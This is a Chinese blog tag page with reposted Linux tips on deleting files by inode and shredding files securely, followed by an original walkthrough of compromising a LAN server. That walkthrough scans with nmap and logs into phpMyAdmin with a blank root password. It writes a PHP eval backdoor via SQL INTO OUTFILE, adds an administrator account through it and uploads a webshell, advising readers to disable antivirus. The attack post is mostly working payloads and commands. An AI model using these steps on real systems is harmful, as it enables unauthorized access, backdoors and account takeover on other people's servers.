寻觅生命中的那一片浅草......

文章带标签 Security

How to: Linux / UNIX Delete or Remove Files With Inode Number

An inode identifies the file and its attributes such as file size, owner, and so on. A unique inode number within the file system identifies each inode. But, why to delete file by an inode number? Sure, you can use rm command to delete file. Sometime accidentally you creates filename with control characters or characters which are unable to be input on a keyboard or special character such as ?, * ^ etc. Removing such special character filenames can be problem. Use following method to delete a file with strange characters in its name:

Please note that the procedure outlined below works with Solaris, FreeBSD, Linux, or any other Unixish oses out there:

Find out file inode
First find out file inode number with any one of the following command:

stat {file-name}

OR

ls -il {file-name}

Use find command to remove file:
Use find command as follows to find and remove a file:

find . -inum [inode-number] -exec rm -i {} \;

When prompted for confirmation, press Y to confirm removal of the file.

Delete or remove files with inode number
Let us try to delete file using inode number.

(a) Create a hard to delete file name:
$ cd /tmp
$ touch “\+Xy \+\8”
$ ls
(b) Try to remove this file with rm command:
$ rm \+Xy \+\8

(c) Remove file by an inode number, but first find out the file inode number:
$ ls -ilOutput:

781956 drwx—— 3 viv viv 4096 2006-01-27 15:05 gconfd-viv
781964 drwx—— 2 viv viv 4096 2006-01-27 15:05 keyring-pKracm
782049 srwxr-xr-x 1 viv viv 0 2006-01-27 15:05 mapping-viv
781939 drwx—— 2 viv viv 4096 2006-01-27 15:31 orbit-viv
781922 drwx—— 2 viv viv 4096 2006-01-27 15:05 ssh-cnaOtj4013
781882 drwx—— 2 viv viv 4096 2006-01-27 15:05 ssh-SsCkUW4013
782263 -rw-r–r– 1 viv viv 0 2006-01-27 15:49 \+Xy \+\8Note: 782263 is inode number.

(d) Use find command to delete file by inode:
Find and remove file using find command, type the command as follows:
$ find . -inum 782263 -exec rm -i {} \;
Note you can also use add \ character before special character in filename to remove it directly so the command would be:
$ rm “\+Xy \+\8”
If you have file like name like name “2005/12/31” then no UNIX or Linux command can delete this file by name. Only method to delete such file is delete file by an inode number. Linux or UNIX never allows creating filename like 2005/12/31 but if you are using NFS from MAC OS or Windows then it is possible to create a such file.

转载自:http://www.cyberciti.biz/tips/delete-remove-files-with-inode-number.html

Linux : How to delete file securely

Recently we had lot of discussion regarding this issue. How to remove files securely so that it cannot be undeleted. Peter Gutmann paper “Secure Deletion of Data from Magnetic and Solid-State Memory” has very good information. Here are some commands/tools available under Debian GNU/Linux (it should work with other Linux distributions) to delete file securely.

srm: Securely remove files or directories
This command is a replacement for rm command. It works under Linux/BSD/UNIX-like OSes. It removes each specified file by overwriting, renaming, and truncating it before unlinking. This prevents other people from undelete or recovering any information about the file from the command line. Because it does lots of operation on file/directory for secure deletion, it also takes lot of time to remove it. Download srm from http://sourceforge.net/projects/srm (RPM file is also available for RPM based Linux distributions)

i) Untar and install the srm:

# ./configure
# make
# make install ii) How to use srm?
srm syntax is like rm command. Read man srm. Here is simple example:

$ srm privateinfo.docwipe: It is a secure file wiping utility
Download wipe from http://wipe.sourceforge.net/
i) Untar and install the wipe

# ./configure
# make
# make installii) How to use wipe?

$ wipe filenameRead man page of wipe for information.

shred: Delete a file securely, first overwriting it to hide its contents.
It is available on most of Linux distributions including Debian GNU/Linux. To remove file called personalinfo.tar.gz :

$ shred -n 200 -z -u personalinfo.tar.gzWhere,

-n: Overwrite N (200) times instead of the default (25)
-z: Add a final overwrite with zeros to hide shreddin
-u: Truncate and remove file after overwriting
Read the man page of shred(1) for more information. Most of these utilities are not effective (read as useless) only if :

File system is log-structured or journaled filesystems, such as JFS, ReiserFS, XFS, Ext3 etc
Your filesystems is RAID-based, compressed filesystem etc
In addition, file system backups and remote mirrors may contain copies of the file that cannot be removed by these utilities.
See also:

Delete (remove) files with inode number – to remove special character filename

转载自:http://www.cyberciti.biz/tips/linux-how-to-delete-file-securely.html

利用phpMyAdmin拿webshell

今天对局域网进行了安全检查

先用nmap对网段进行扫描,看下机器都监听了哪些端口,刚知道nmap可以扫描整个网段

nmap 192.168.16.0/24

恩,有结果了,将结果保存下来,查找那些开了80的,将IP复制到浏览器逐个尝试

终于被我找到一台

浏览器访问
http://192.168.16.19/
允许列目录的

页面底部有服务器信息
Apache/2.2.9 (APMServ) PHP/5.2.6 Server at 192.168.16.19 Port 80

用的是APMserv,应该有phpMyAdmin,自己下载了个APMserv,对比了下目录结构
访问
http://192.168.16.19/phpmyadmin/

成功了,而且MySQL的root帐号没有设置密码,直接登录进去了

这时需要做的是找出网站存放的系统路径,APMserv默认是有phpinfo.php
尝试访问http://192.168.16.19/phpinfo.php
提示没有文件,看来只能另外找办法

回到phpmyadmin,点击“显示 MySQL 的系统变量”

可以看到MySQL的目录:F:\APMServ5.2.6\MySQL5.1\

那phpMyAdmin的目录就是F:\APMServ5.2.6\www\phpMyAdmin\

通过数据库,导出一个PHP文件
随便选个数据库,然后执行以下的sql

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php @eval($_POST[cmd])?>’);
select cmd from a into outfile ‘F:/APMServ5.2.6/www/phpMyAdmin/eval.php’;
Drop TABLE IF EXISTS a;

这是我们的后门
http://192.168.16.19/phpmyadmin/eval.php

加个系统帐号
http://192.168.16.19/phpmyadmin/eval.php?cmd=net user test test /add
将test设置成系统管理员
http://192.168.16.19/phpmyadmin/eval.php?cmd=net localgroup administrators test /add

可惜没有开远程桌面,不能登陆

那不登录,传个webshell上去,下载些文件回来

下载“lanker一句话PHP后门客户端3.0内部版”

注意,杀毒软件会认为lanker一句话PHP后门客户端3.0内部版.htm是病毒,注意先关闭杀毒软件

我们后面地址是http://192.168.16.19/phpmyadmin/eval.php

传test.php上去,访问http://192.168.16.19/phpmyadmin/test.php

这就似乎我们的webshell了

2024年三月
« 5月    
 123
45678910
11121314151617
18192021222324
25262728293031